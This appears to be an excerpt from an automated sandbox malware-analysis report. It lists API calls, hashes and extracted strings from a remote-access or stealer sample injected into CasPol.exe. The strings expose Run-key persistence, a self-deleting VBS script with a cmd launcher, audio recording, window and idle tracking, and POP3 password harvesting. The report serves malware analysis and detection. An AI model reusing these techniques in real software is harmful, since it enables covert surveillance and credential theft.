                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                      • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                      • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                    • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                    • API String ID: 1861856835-3168347843
                                                                                                                    • Opcode ID: 0671730743dcdda34a708e1622111953b6d36e6e82ef052ddb06e33766e99e90
                                                                                                                    • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                                                                                                    • Opcode Fuzzy Hash: 0671730743dcdda34a708e1622111953b6d36e6e82ef052ddb06e33766e99e90
                                                                                                                    • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                      • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                    • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                    • API String ID: 3797177996-1998216422
                                                                                                                    • Opcode ID: 4fbe5e964353057208d63472bf77b8e21c80dda7ec5e7c4c15e1be7b02e28e2a
                                                                                                                    • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                                                                                    • Opcode Fuzzy Hash: 4fbe5e964353057208d63472bf77b8e21c80dda7ec5e7c4c15e1be7b02e28e2a
                                                                                                                    • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                                                                                                    APIs
                                                                                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                                    • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                                    • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                    • API String ID: 738084811-1408154895
                                                                                                                    • Opcode ID: 34c9b7c386d9b976f4a833e2789a2a9ffd4d080efd6be91700f5a66860160ded
                                                                                                                    • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                    • Opcode Fuzzy Hash: 34c9b7c386d9b976f4a833e2789a2a9ffd4d080efd6be91700f5a66860160ded
                                                                                                                    • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                    • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                    • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                    • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Write$Create
                                                                                                                    • String ID: RIFF$WAVE$data$fmt
                                                                                                                    • API String ID: 1602526932-4212202414
                                                                                                                    • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                    • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                    • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                    • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                    • API String ID: 1646373207-165202446
                                                                                                                    • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                    • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                    • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                    • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                    • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                    • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                    • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                                    • API String ID: 1579085052-1280438975
                                                                                                                    • Opcode ID: 2d304c15f4e1f7a33ee26e5bac1824232192d3ef6427a9269418118ddfb41cfb
                                                                                                                    • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                                                                                    • Opcode Fuzzy Hash: 2d304c15f4e1f7a33ee26e5bac1824232192d3ef6427a9269418118ddfb41cfb
                                                                                                                    • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                      • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                      • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                    • _strlen.LIBCMT ref: 10001855
                                                                                                                    • _strlen.LIBCMT ref: 10001869
                                                                                                                    • _strlen.LIBCMT ref: 1000188B
                                                                                                                    • _strlen.LIBCMT ref: 100018AE
                                                                                                                    • _strlen.LIBCMT ref: 100018C8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                    • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                    • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041B217
                                                                                                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                                                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                                                                                    • _wcslen.LIBCMT ref: 0041B2EB
                                                                                                                    • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                                    • GetLastError.KERNEL32 ref: 0041B323
                                                                                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                                    • GetLastError.KERNEL32 ref: 0041B380
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                    • String ID: ?
                                                                                                                    • API String ID: 3941738427-1684325040
                                                                                                                    • Opcode ID: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                                                                                                    • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                                    • Opcode Fuzzy Hash: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                                                                                                    • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen
                                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                    • API String ID: 4218353326-230879103
                                                                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                    • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                    • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3899193279-0
                                                                                                                    • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                    • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                                    • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                    • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                    • API String ID: 2490988753-744132762
                                                                                                                    • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                    • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                                                                                    • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                    • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEnumOpen
                                                                                                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                    • API String ID: 1332880857-3714951968
                                                                                                                    • Opcode ID: 215c57200e4132b606c9945ca49ffbcd4ff4902c7a8f2fc98260f39500a70a98
                                                                                                                    • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                                                                                                    • Opcode Fuzzy Hash: 215c57200e4132b606c9945ca49ffbcd4ff4902c7a8f2fc98260f39500a70a98
                                                                                                                    • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                                                                                                    APIs
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                    • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                    • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                                                                                    • API String ID: 911427763-1497357211
                                                                                                                    • Opcode ID: 30f4195c6794a9366bb2de9f07a7a45867c5670f1fc2455abb98f24b207642f8
                                                                                                                    • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                                                                                    • Opcode Fuzzy Hash: 30f4195c6794a9366bb2de9f07a7a45867c5670f1fc2455abb98f24b207642f8
                                                                                                                    • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                                                                                    APIs
